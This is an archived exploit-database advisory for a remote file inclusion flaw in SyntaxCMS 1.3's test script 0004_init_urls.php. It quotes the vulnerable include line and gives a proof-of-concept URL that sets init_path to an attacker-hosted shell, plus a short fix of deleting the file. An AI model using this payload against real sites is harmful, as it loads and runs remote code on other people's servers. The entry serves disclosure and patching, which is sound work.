SyntaxCMS 1.3 - '0004_init_urls.php' Remote File Inclusion
Author: MoHaJaLi
type: webapps
platform: php
port:
date_added: 2006-09-23
date_updated: 2016-09-12
verified: 1
codes: OSVDB-29124;CVE-2006-5055
tags:
aliases:
screenshot_url:
application_url: http://www.exploit-db.comSyntaxCMS1.3.tar.gz
Remote File Include in syntaxCMS
Vulnerable File:
0004_init_urls.php
Vulnerable Code:
1 <?php
2 include_once( $init_path . '/init.urls.php' );
3 ?>
PoC:
http://www.poweredbysyntaxcmssite.com/admin/testing/tests/0004_init_urls.php?init_path=http://YourShell?&
Solution:
Remove This File...it's not needed...just used for tests
Found by MoHaJaLi
Greetz to Eddy_BAck0o
# milw0rm.com [2006-09-24]